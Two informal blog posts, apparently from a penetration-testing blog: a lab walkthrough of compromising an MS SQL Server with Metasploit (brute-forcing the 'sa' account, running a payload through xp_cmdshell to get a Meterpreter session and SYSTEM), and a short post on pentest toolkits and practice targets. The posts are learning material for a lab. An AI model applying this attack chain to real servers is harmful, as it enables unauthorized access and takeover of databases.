Attacking SQL Database Server using Metasploit

Aloha,

Lets see how we can use the Metasploit framework to pawn an MS SQL Server

Our Lab:
A  MacBook with Vmware Fusion on it
Target: A Vrtual Guest with Windows 2003 Server with the Ip address  172.16.226.131
Attacker: A Virtual Guest with Backtrack 5R1 with the Ip address 172.16.226.128

So Lets go….

 

Commands:

  • nmap -O target

The SQL Database TCP port 1433.

  • mssql_ping

Setting the RHOSTS option we can get information about the database including version information, server name etc

  • mssql_login

Setting the options RHOSTS, PASS_FILE, VERBOSE  we can brute-force attack the target for valid credentials. If the server is misconfigured or the passwords are weak we can find accounts that we can use in the next command. Here I am attacking to the “sa” account. The “sa” account is the DBO (db_owner) for all databases created on the server. The account has administrative privileges on the database.

[+] 172.16.226.131:1433 – MSSQL – successful login ‘sa’ : ‘password’

  • mssql_payload

Setting the options RHOSTS,PASSWORD which are set from the previous command  we can try to exploit the Server. The exploit uses the “xp_cmdshell” stored procedure to execute commands on the Server.

[*] Meterpreter session 1 opened

  • getsystem

I am working on a new post about metepreter so stay tuned…. 

 

 

Pentesting ToolKits and Targets

Aloha,

Here we go.

We need knowledge, we need tools and targets we need  a lab  environment.

It is illegal to try penetration procedures in live environments without the written permissions of the owner so a test environment is a must have.  In a another post I will  analyze how we can create a lab environment, for now lets see  a list in no particular order of toolkits and targets. Luckily enough there are plenty out there.!

This list will always be updated .

Penetration Toolkits
These  are live CDs or DVDs. I am not going to analyze any of this right now. I am using the Backtrack linux distribution probably because is the first one I started with or…….

Targets
These are live CDs, projects or vmdk files. You can use them  for pen-testing skill development and testing.